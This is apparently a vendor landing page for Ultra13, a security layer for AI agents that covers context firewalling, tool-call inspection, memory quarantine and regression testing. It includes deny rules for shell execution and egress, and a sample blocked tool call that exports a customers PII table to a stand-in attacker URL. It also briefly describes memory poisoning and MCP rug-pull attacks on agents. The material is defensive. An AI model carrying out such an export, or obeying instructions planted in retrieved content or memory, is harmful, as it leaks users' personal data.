Ultra13
For CTOs · VP Engineering · AI leads

Ship AI agents with a security harness, not hope.

Ultra13 gives engineering teams offensive agent testing, context-aware runtime controls, and regression validation for agents that use RAG, memory, MCP, APIs, code execution, browsers, and internal tools.

where Ultra13 sits
External / user content
untrusted by default
Input classification + trust labelling
provenance attached to every span
Prompt / context assembly
what the model is allowed to see
RAG · memory · MCP · tool descriptions
evidence, not instruction
Ultra13 Context Firewall
source-to-sink policy + decisions
Model / agent loop
plan → tool → observe → act
Tool gateway / action gateway
inspected before execution
Audit log + validation harness
replayable, regression-tested
Control points

Enforcement where it actually matters.

The firewall is not a wrapper around the prompt. It sits at every boundary the agent crosses.

Prompt / context assembly

Decide what the model is allowed to see for this request.

Retrieved context

Treat RAG chunks as untrusted evidence with per-source policy.

Memory reads / writes

Gate what becomes persistent, and what it’s allowed to authorize.

MCP responses

Validate tool descriptions and responses; catch rug-pulls and shadowing.

Tool calls

Inspect name, args, identity, tenant, data class, and side effects.

Outbound actions

Control egress, exports, webhooks, shell, and code execution.

Source-to-sink policy

Which context can influence which action.

External web content can answer a question — but it cannot authorize a database export, a shell command, or an outbound webhook. You declare the boundary; the firewall enforces it.

policy/source-to-sink.rego
allow            sink=answer        from={user, rag, web, mcp}
deny             sink=db.export     from={web, rag, mcp, memory}
deny             sink=shell.exec    from=*            unless approved
deny             sink=webhook.post  from={web, rag}   # block egress
require_approval sink=*.write       when data_class=PII
treat            retrieved_context  as evidence not instruction
Tool-call inspection

Inspect the call before it runs.

Tool name, arguments, target resource, user identity, tenant, data classification, side effects, and the trust of the context that requested it — evaluated against policy, then a decision.

firewall.inspect(tool_call)
BLOCK
tool_namedatabase.export
arguments{
table"customers"
format"csv"
destination"https://paste.evil.sh/x"
}
user_identitysvc-agent@app
tenant_idacme-prod
data_classificationPII · restricted
side_effectsbulk_read · network_egress
origin_trustexternal (web content)
policy_decision BLOCK
// source-to-sink: external context cannot authorize a bulk PII export to an untrusted destination
memory safety

Poisoned memory never becomes standing instruction.

Untrusted memory is quarantined and trust-labelled, with TTLs on what can persist. A note an attacker planted last session can’t silently authorize an action this one.

trust-labelquarantinettlno implicit auth
continuous validation

Regression tests for agent security.

Re-run the offensive suite whenever the model, prompt, retrieval source, tool, or policy changes. Every change resets the risk posture — so every change gets re-tested.

model swapprompt changenew toolnew sourcepolicy diff
Integrations

Framework-neutral by design.

Ultra13 wraps the boundaries, not your framework. Bring whatever stack your agents already run on.

OpenAIAnthropicBedrockLangChainLlamaIndexCustom agentsMCPREST APIsVector DBsInternal tools
In the path

Inline, without inheriting new risk.

Drop it between your agent and the world without a new model dependency, a new token bill, or a new region problem.

Deterministic-first screening

Fast deterministic detectors run first, then a purpose-built specialist classifier checks what passes — not a generative LLM-judge in the hot path. Two tiers, fail-open: an outage falls back to detectors, never quarantines clean traffic.

Your model stays yours

The firewall fronts your agent and screens the boundary — bring your own model, keys, and provider bill. We screen the traffic; we never proxy-resell tokens or replace your model.

Choose your region

Run the managed service in the USA, EU, or UK for data residency — or self-host the data plane in your own VPC for full control.

Performance

Fast enough to leave in the request path.

The deterministic screening tier is CPU-cheap — measured on a single core, not estimated.

≈ 0.15 ms
deterministic screening CPU / request · p99 ≈ 0.19 ms
≈ 0.29 ms
end-to-end through the proxy · p99 ≈ 0.5 ms
< 0.1%
added latency vs. a typical LLM call — unmeasurable to a user

Inline SDK adds only screening CPU — no network hop. A quota rule adds one ~0.1–0.2 ms Redis round-trip; the opt-in classifier and OCR tiers add inference only when enabled.

Give us one workflow and one toolchain. We’ll show you where it breaks.

A technical teardown, context firewall controls, and a regression harness for the agent you’re shipping.